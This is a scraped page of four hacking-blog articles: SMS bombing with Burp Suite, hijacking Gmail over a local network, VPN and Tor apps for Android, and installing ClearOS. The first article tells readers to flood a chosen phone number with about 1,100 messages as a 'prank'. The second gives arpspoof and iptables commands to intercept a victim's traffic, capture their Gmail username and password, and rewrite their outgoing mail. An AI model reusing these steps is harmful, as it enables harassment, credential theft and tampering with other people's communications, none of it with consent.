SMS Bombing on Mobile using Burpsuite

In this article we will learn about SMS bombing. It is used to prank your friends by sending those hundreds and thousands of SMS at once. There are many third party sites to do so but there are usually of no use. We are introducing a different method to do so and all you need is you Kali.

We are going to use BurpSuite that means we have to set up proxy first. And for that go to browser settings and select prefences.

Then select advanced option and then go to network settings.

A dialogue box will open and from it select Manual Proxy Configuration. As you have selected this, you can either keep the http proxy as localhost or you can set it to 127.0.0.1

Now that proxy has been set up open BurpSuite.

Now select the proxy tab and then the options tab and check the check box of interface. Then click on Edit button on the left side.

It will open a dialogue box. In this select Support invisible proxying option. Click on OK.

When you return to the previous window check the invisible box too.

As of now all the settings have been done. Now what we need is to send the message and for that we will log in to way2sms.com.

After logging in generate the message and give the contact number to which you want to send the messages. Before clicking on send turn on the interception in BurpSuite.

When you click the send button the request will first go to Burpsuite as it captures the traffic. When the traffic has been captured right clicks anywhere and select Send to intruder option or simply use keyboard shortcut i.e. ctrl+i.

Now in the intruder tab select options tab. It will show you the details of the traffic that is the number to which the SMS was destined to and the text message.

Select the part of the text message and click on add.

Now go to Payloads tab and select Brute Force in the Payload type option.

Then give the character set of 123456789 i.e. 1-9 numbers. And give the minimum length of 1 and the maxumum length of 3. Here, minimum and maximum length means the length of digits that will created using character set. From the customization that we have done it will create 1100 messages for the receiver.

Now finally to start the attack goes to the intruder menu and select Start Attack from the drop down menu.

Once the attack starts you can see that the receiver will start receiving all the messages in the interval of 1 to 5 seconds as shown in the image below:

I stopped the attack after 29 messages which were send in the time span of 1 to 2 minutes.

Author: Shivam Gupta is An Ethical HackerCyber Security Expert, Penetration Tester, India. you can contact here

Hijacking Gmail Message on Air using Burpsuite

There are various vibrant attacks of burpsuite that many not know off; therefore we will try one for those in this article today. We will learn how to get between the networks of gmail and then to change the message o the mail before it reaches receiver.

First of all, go to the terminal of Kali and type:

arspoof -i wlan0 -t 192.168.100.4 192.168.100.1

Here,

-i –> interface

wlan0 –> network (This can be either ethernet or wlan depending on your victim i.e. if your victim is using eth0 then you should also use eth0)

-t –> target

192.168.100.4 –> Victim IP

192.168.100.1 –> DNS

Execution of the above command will capture the packets that are sent from victim to router. And once we have captured these packets we will open another terminal in Kali and type the following command which will make us capture all the packets from router to victim.

arpspoof -i wlan0 -t 192.168.100.1 192.168.100.4

Here,

-i –> interface

wlan0 –> network

-t –> target

192.168.100.1 –> DNS

192.168.100.4 –> victim IP

This command will capture packets that are sent from router to victim IP. Now type the following the command so that IP forwarding is enabled in our PC.

echo 1 > /proc/sys/net/ipv4/ip_forward

Then type the following the command so that all the packets on port 80 will go through our IP.

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to -desitination 192.168.100.5

Then type the following the command so that we can all the packets on port 443 will go from our IP.

iptables -t nat -A PREROUTING -p tcp –dport 443 -j DNAT –to -desitination 192.168.100.5

After all this is done then open burpsuite and go to proxy tab and then select options tab. Once you have reached here click on Add button.

Clicking on Add button will make the following options appear. In this give port no 80 in the box adjacent to bind to port and in specific address give your IP.

Further on, Select Request Handling tab and check Support invisible proxy. And then click on ok.

Repeat the above steps for Port no 443 too.

After clicking on ok make sure all the boxes of running and invisible are check.

When the victim will sign in his/her gmail account we have its data captured in burpsuite.

And all this captured data will contain username and password of the victim as shown below.

Here is the closer view to the username and password.

The victim will type and send the message without suspicion:

But as the victim will click on send button its mail will come to us before reaching destination.

Now you can change the text of the message by a simple left click on the message area and type your message as I changed HELLO THIS IS TESTING to YOU HAVE BEEN HACKED.

Once you change the message then click on Forward button on the top left side and the mail will go forward to its destination as shown below:

Shivam Gupta is An Ethical HackerCyber Security Expert, Penetration Tester, India. you can contact here

5 Ways to Surf Internet Anonymously in Android Phone

Proxy is the most trending and one of the most effective ways which hackers use to hide their IP address, allowing them to mask the actual source of attack by impersonating a fake source address of proxy. They connect to proxy servers, which provide resources for them to connect to different networks. Hackers usually use a chain of multiple proxy servers to avoid detection.

Though many tools are available for proxy, the below mentioned are arguably amongst the better ones.

1.HOTSPOT SHIELD:

    Go to your android play store and download Hotspot Shield

Once the tool gets downloaded, start it on your mobile. It should look something like this

Click on connect option and you are good to go.

Snap VPN:

Go to your android play store and download snap VPNOnce the tool gets downloaded, start the app.

It shows the list of countries which provide proxy servers and are available to use without any cost.

Next to it is the signal strength of respective server connection. Click on GO.

Once the connection is established, you are good to go.

ZenMate:

Go to your android play store and search for ZenMate. Click on install

Once the app gets installed, open the app Select any of the enlisted countries and tap on the sheild icon to connect to their server.

Finally, when you get connected, it will look something like this:

Orbot (Tor for Android) :

Orbot is android version of tor and one of most used proxy tool for mobile. Go to your android play store and search for orbot.

Click on install once the tool is installed, open it.

Long press on the onion icon to start

VPN Easy :

Go on your android play store and search for VPN easy. Install the app

When the tool gets installed, open the app Click on the connect button in the middle to start the connection

When you get connected to remote proxy server, it would appear something like this:

Author: Shivam yadav is a hacking enthusiast, a learner and a researcher in this field.

 

Setup Firewall Pentest Lab using Clear OS

Clear OS is basically a Linux based server operating system for small business which comes with server, networking and gateway related functions. Clear OS is available in a Home, Business and free Community Edition. It is normally managed from a web-based interface but it can also be completely operated from a command line. But mostly ClearOS is used as firewall.

Let’s see how to install Clear OS.

First, make bootable disk or pen drive from Yumi or Rufus.

Then restart your computer and select:  Install ClearOS

After selecting press Enter

Select the language in which you are comfortable.

After that Installation summary interface will appear

Select Date and Time from localization section.

Then select installation source and click on done.

After that select Network and host name. Turn on and configure your network setting.

Now after setting everything, clicks on Begin Installation and then installation will start. You have to set root password also.

After finish installing system will reboot. And then clear OS will provide you with a link that contains IP address.  Open that link in a browser.

When you will open that link in your browser it will ask you to login into your account, use username as root and password what you set at the time of installation and login.

After login you have to configure clearOS

Configure network interfaces. Change type to static and set ip address what you set IP address and then click next.

Select your Edition and click next.

Fill system registration form and click next.

Now you have to set hostname for your NIC (Network Interface Card). Set hostname for internal and external NIC and click next.

After that from marketplace you have select and install apps which is required for monitoring, administration. After finishing your configuration a simple dashboard will appear, from here you can utilize clearOS as per your need.

Author: AkshayBhardwaj is a passionate Hacker, Information Security Researcher | Sketch Artist |Technical writer. You can follow him on LinkedIn and Facebook

Related Posts Plugin for WordPress, Blogger...